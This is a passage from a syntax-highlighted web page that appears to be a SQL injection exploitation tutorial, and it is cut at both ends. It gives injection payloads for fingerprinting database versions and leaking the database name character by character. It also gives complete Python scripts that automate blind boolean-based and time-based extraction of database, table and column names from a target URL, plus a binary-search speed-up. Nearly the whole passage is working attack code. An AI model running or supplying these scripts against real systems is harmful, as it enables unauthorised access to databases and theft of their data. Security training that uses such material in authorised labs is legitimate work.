style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;PostgreSQL&#x26;#x27;</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- MSSQL</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(@@</span><span style="color:#C678DD">version</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">9</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;Microsoft&#x26;#x27;</span><span style="color:#7F848E;font-style:italic">--</span></span></code></pre> <h3 id="extracting-the-name-of-the-current-database">Extracting the name of the current database</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- Name length</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#C678DD"> LENGTH</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">database</span><span style="color:#ABB2BF">())</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">6</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- First character</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">database</span><span style="color:#ABB2BF">(),</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;d&#x26;#x27;</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Second character</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">database</span><span style="color:#ABB2BF">(),</span><span style="color:#D19A66">2</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;#x27;v&#x26;#x27;</span><span style="color:#7F848E;font-style:italic">--</span></span></code></pre> <h3 id="python-script-for-boolean-based-automation">Python script for boolean-based automation</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/usr/bin/env python3</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># blind_sqli_extract.py — Boolean-based extractor</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> requests</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> string</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> sys</span></span> <span class="line"></span> <span class="line"><span style="color:#D19A66">TARGET</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;http:</span><span style="color:#56B6C2">//</span><span style="color:#ABB2BF">target.com</span><span style="color:#56B6C2">/</span><span style="color:#ABB2BF">user</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#D19A66">PARAM</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">id&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#D19A66">CHARS</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> string.ascii_lowercase </span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF"> string.digits </span><span style="color:#56B6C2">+</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;_</span><span style="color:#56B6C2">-@</span><span style="color:#ABB2BF">.</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> inject</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">payload</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">) -&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">bool</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;Returns </span><span style="color:#D19A66">True</span><span style="color:#C678DD"> if</span><span style="color:#ABB2BF"> the injection condition </span><span style="color:#C678DD">is</span><span style="color:#D19A66"> TRUE</span><span style="color:#ABB2BF">.</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#ABB2BF"> params </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> {</span><span style="color:#D19A66">PARAM</span><span style="color:#ABB2BF">: f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">1</span><span style="color:#61AFEF"> AND</span><span style="color:#ABB2BF"> ({payload})</span><span style="color:#FFFFFF">--</span><span style="color:#56B6C2"> -&#x26;</span><span style="color:#ABB2BF">quot;}</span></span> <span class="line"><span style="color:#ABB2BF"> r </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> requests.</span><span style="color:#61AFEF">get</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">TARGET</span><span style="color:#ABB2BF">, </span><span style="color:#E06C75;font-style:italic">params</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">params, </span><span style="color:#E06C75;font-style:italic">timeout</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">10</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"> # Adjust the marker to whatever differentiates TRUE from FALSE</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;Welcome</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot; </span><span style="color:#C678DD">in</span><span style="color:#ABB2BF"> r.text</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">query</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66;font-style:italic">max_len</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">int</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 64</span><span style="color:#ABB2BF">) -&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;Extract a string value one character at a time.</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#ABB2BF"> result </span><span style="color:#56B6C2">=</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#C678DD"> for</span><span style="color:#ABB2BF"> pos </span><span style="color:#C678DD">in</span><span style="color:#56B6C2"> range</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">, max_len </span><span style="color:#56B6C2">+</span><span style="color:#D19A66"> 1</span><span style="color:#ABB2BF">):</span></span> <span class="line"><span style="color:#ABB2BF"> found </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> False</span></span> <span class="line"><span style="color:#C678DD"> for</span><span style="color:#ABB2BF"> ch </span><span style="color:#C678DD">in</span><span style="color:#D19A66"> CHARS</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> payload </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#61AFEF">SUBSTRING</span><span style="color:#ABB2BF">(({query}),{pos},</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;{ch}&#x26;#x27;&#x26;quot;</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#61AFEF"> inject</span><span style="color:#ABB2BF">(payload):</span></span> <span class="line"><span style="color:#ABB2BF"> result </span><span style="color:#56B6C2">+=</span><span style="color:#ABB2BF"> ch</span></span> <span class="line"><span style="color:#ABB2BF"> sys.stdout.</span><span style="color:#61AFEF">write</span><span style="color:#ABB2BF">(ch)</span></span> <span class="line"><span style="color:#ABB2BF"> sys.stdout.</span><span style="color:#61AFEF">flush</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#ABB2BF"> found </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> True</span></span> <span class="line"><span style="color:#C678DD"> break</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#C678DD"> not</span><span style="color:#ABB2BF"> found:</span></span> <span class="line"><span style="color:#C678DD"> break</span><span style="color:#7F848E;font-style:italic"> # End of string</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#ABB2BF"> result</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">if</span><span style="color:#E06C75"> __name__</span><span style="color:#56B6C2"> ==</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;__main__</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;:</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;[</span><span style="color:#56B6C2">*</span><span style="color:#ABB2BF">] Extracting database name</span><span style="color:#D19A66">...</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"><span style="color:#ABB2BF"> db </span><span style="color:#56B6C2">=</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">SELECT</span><span style="color:#61AFEF"> database</span><span style="color:#ABB2BF">()</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;[</span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF">] Database: {db}</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;[</span><span style="color:#56B6C2">*</span><span style="color:#ABB2BF">] Extracting first table name</span><span style="color:#D19A66">...</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"><span style="color:#ABB2BF"> table </span><span style="color:#56B6C2">=</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span></span> <span class="line"><span style="color:#ABB2BF"> f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">SELECT</span><span style="color:#ABB2BF"> table_name </span><span style="color:#D19A66">FROM</span><span style="color:#ABB2BF"> information_schema.tables </span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span></span> <span class="line"><span style="color:#ABB2BF"> f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">WHERE</span><span style="color:#E06C75;font-style:italic"> table_schema</span><span style="color:#56B6C2">=&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;{db}&#x26;#x27; LIMIT 1&#x26;quot;</span></span> <span class="line"><span style="color:#ABB2BF"> )</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;[</span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF">] First table: {table}</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;[</span><span style="color:#56B6C2">*</span><span style="color:#ABB2BF">] Extracting columns</span><span style="color:#D19A66">...</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"><span style="color:#ABB2BF"> cols </span><span style="color:#56B6C2">=</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span></span> <span class="line"><span style="color:#ABB2BF"> f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">SELECT</span><span style="color:#61AFEF"> GROUP_CONCAT</span><span style="color:#ABB2BF">(column_name) </span><span style="color:#D19A66">FROM</span><span style="color:#ABB2BF"> information_schema.columns </span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span></span> <span class="line"><span style="color:#ABB2BF"> f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">WHERE</span><span style="color:#E06C75;font-style:italic"> table_name</span><span style="color:#56B6C2">=&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;{table}&#x26;#x27;&#x26;quot;</span></span> <span class="line"><span style="color:#ABB2BF"> )</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;[</span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF">] Columns: {cols}</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span></code></pre> <hr> <h2 id="time-based-exploitation-manual">Time-Based Exploitation (Manual)</h2> <p>When there is no visual difference in the response, use time delays as a channel of information.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#7F848E;font-style:italic">#!/usr/bin/env python3</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># time_based_sqli.py — Time-based extractor</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> requests</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> string</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> time</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> sys</span></span> <span class="line"></span> <span class="line"><span style="color:#D19A66">TARGET</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;http:</span><span style="color:#56B6C2">//</span><span style="color:#ABB2BF">target.com</span><span style="color:#56B6C2">/</span><span style="color:#ABB2BF">user</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#D19A66">PARAM</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">id&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#D19A66">DELAY</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 3</span><span style="color:#7F848E;font-style:italic"> # seconds to sleep if TRUE</span></span> <span class="line"><span style="color:#D19A66">THRESHOLD</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 2.5</span><span style="color:#7F848E;font-style:italic"> # detection threshold</span></span> <span class="line"><span style="color:#D19A66">CHARS</span><span style="color:#56B6C2"> =</span><span style="color:#ABB2BF"> string.ascii_lowercase </span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF"> string.digits </span><span style="color:#56B6C2">+</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;_</span><span style="color:#56B6C2">-@</span><span style="color:#ABB2BF">.</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> inject_time</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">payload</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">) -&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">bool</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;Returns </span><span style="color:#D19A66">True</span><span style="color:#C678DD"> if</span><span style="color:#ABB2BF"> the response took longer than </span><span style="color:#D19A66">THRESHOLD</span><span style="color:#ABB2BF">.</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#ABB2BF"> full </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">1</span><span style="color:#D19A66"> AND</span><span style="color:#61AFEF"> IF</span><span style="color:#ABB2BF">(({payload}), </span><span style="color:#61AFEF">SLEEP</span><span style="color:#ABB2BF">({</span><span style="color:#D19A66">DELAY</span><span style="color:#ABB2BF">}), </span><span style="color:#D19A66">0</span><span style="color:#ABB2BF">)</span><span style="color:#FFFFFF">--</span><span style="color:#56B6C2"> -&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#ABB2BF"> params </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> {</span><span style="color:#D19A66">PARAM</span><span style="color:#ABB2BF">: full}</span></span> <span class="line"><span style="color:#ABB2BF"> start </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> time.</span><span style="color:#61AFEF">time</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#C678DD"> try</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> requests.</span><span style="color:#61AFEF">get</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">TARGET</span><span style="color:#ABB2BF">, </span><span style="color:#E06C75;font-style:italic">params</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">params, </span><span style="color:#E06C75;font-style:italic">timeout</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">DELAY</span><span style="color:#56B6C2"> +</span><span style="color:#D19A66"> 5</span><span style="color:#ABB2BF">)</span></span> <span class="line"><span style="color:#C678DD"> except</span><span style="color:#ABB2BF"> requests.exceptions.Timeout:</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#D19A66"> True</span></span> <span class="line"><span style="color:#ABB2BF">elapsed </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> time.</span><span style="color:#61AFEF">time</span><span style="color:#ABB2BF">() </span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF"> start</span></span> <span class="line"><span style="color:#C678DD">return</span><span style="color:#ABB2BF"> elapsed </span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">gt;</span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> THRESHOLD</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">query</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66;font-style:italic">max_len</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">int</span><span style="color:#56B6C2"> =</span><span style="color:#D19A66"> 64</span><span style="color:#ABB2BF">) -&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF">result </span><span style="color:#56B6C2">=</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#C678DD">for</span><span style="color:#ABB2BF"> pos </span><span style="color:#C678DD">in</span><span style="color:#56B6C2"> range</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">, max_len </span><span style="color:#56B6C2">+</span><span style="color:#D19A66"> 1</span><span style="color:#ABB2BF">):</span></span> <span class="line"><span style="color:#ABB2BF">found </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> False</span></span> <span class="line"><span style="color:#C678DD"> for</span><span style="color:#ABB2BF"> ch </span><span style="color:#C678DD">in</span><span style="color:#D19A66"> CHARS</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> payload </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#61AFEF">SUBSTRING</span><span style="color:#ABB2BF">(({query}),{pos},</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=&#x26;</span><span style="color:#7F848E;font-style:italic">#x27;{ch}&#x26;#x27;&#x26;quot;</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#61AFEF"> inject_time</span><span style="color:#ABB2BF">(payload):</span></span> <span class="line"><span style="color:#ABB2BF"> result </span><span style="color:#56B6C2">+=</span><span style="color:#ABB2BF"> ch</span></span> <span class="line"><span style="color:#ABB2BF"> sys.stdout.</span><span style="color:#61AFEF">write</span><span style="color:#ABB2BF">(ch)</span></span> <span class="line"><span style="color:#ABB2BF"> sys.stdout.</span><span style="color:#61AFEF">flush</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#ABB2BF"> found </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> True</span></span> <span class="line"><span style="color:#C678DD"> break</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#C678DD"> not</span><span style="color:#ABB2BF"> found:</span></span> <span class="line"><span style="color:#C678DD"> break</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">()</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#ABB2BF"> result</span></span> <span class="line"></span> <span class="line"><span style="color:#C678DD">if</span><span style="color:#E06C75"> __name__</span><span style="color:#56B6C2"> ==</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;__main__</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;:</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;[</span><span style="color:#56B6C2">*</span><span style="color:#ABB2BF">] Time</span><span style="color:#56B6C2">-</span><span style="color:#ABB2BF">based extraction — this will be slow</span><span style="color:#D19A66">...</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"><span style="color:#ABB2BF"> db </span><span style="color:#56B6C2">=</span><span style="color:#61AFEF"> extract_string</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">SELECT</span><span style="color:#61AFEF"> database</span><span style="color:#ABB2BF">()</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"><span style="color:#56B6C2"> print</span><span style="color:#ABB2BF">(f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;[</span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF">] Database: {db}</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span></code></pre> <p>> <strong>NOTE:</strong> Time-based SQLi is extremely slow for long strings. Use binary search (ascii range) to optimize.</p> <h3 id="optimization-with-binary-search">Optimization with Binary Search</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#C678DD">def</span><span style="color:#61AFEF"> extract_char_binary</span><span style="color:#ABB2BF">(</span><span style="color:#D19A66;font-style:italic">query</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66;font-style:italic">pos</span><span style="color:#ABB2BF">: </span><span style="color:#56B6C2">int</span><span style="color:#ABB2BF">) -&#x26;</span><span style="color:#61AFEF">gt</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">str</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;Extract a single character using binary search on </span><span style="color:#D19A66">ASCII</span><span style="color:#ABB2BF"> value.</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#ABB2BF"> lo, hi </span><span style="color:#56B6C2">=</span><span style="color:#D19A66"> 32</span><span style="color:#ABB2BF">, </span><span style="color:#D19A66">126</span><span style="color:#7F848E;font-style:italic"> # printable ASCII range</span></span> <span class="line"><span style="color:#C678DD"> while</span><span style="color:#ABB2BF"> lo </span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">lt; hi:</span></span> <span class="line"><span style="color:#ABB2BF"> mid </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> (lo </span><span style="color:#56B6C2">+</span><span style="color:#ABB2BF"> hi) </span><span style="color:#56B6C2">//</span><span style="color:#D19A66"> 2</span></span> <span class="line"><span style="color:#ABB2BF"> payload </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> f</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#61AFEF">ASCII</span><span style="color:#ABB2BF">(</span><span style="color:#61AFEF">SUBSTRING</span><span style="color:#ABB2BF">(({query}),{pos},</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">))</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">gt;{mid}</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot</span><span style="color:#FFFFFF">;</span></span> <span class="line"><span style="color:#C678DD"> if</span><span style="color:#61AFEF"> inject_time</span><span style="color:#ABB2BF">(payload):</span></span> <span class="line"><span style="color:#ABB2BF"> lo </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> mid </span><span style="color:#56B6C2">+</span><span style="color:#D19A66"> 1</span></span> <span class="line"><span style="color:#C678DD"> else</span><span style="color:#ABB2BF">:</span></span> <span class="line"><span style="color:#ABB2BF"> hi </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> mid</span></span> <span class="line"><span style="color:#C678DD"> return</span><span style="color:#56B6C2"> chr</span><span style="color:#ABB2BF">(lo) </span><span style="color:#C678DD">if</span><span style="color:#D19A66"> 32</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#ABB2BF">lt;</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> lo </span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">lt;</span><span 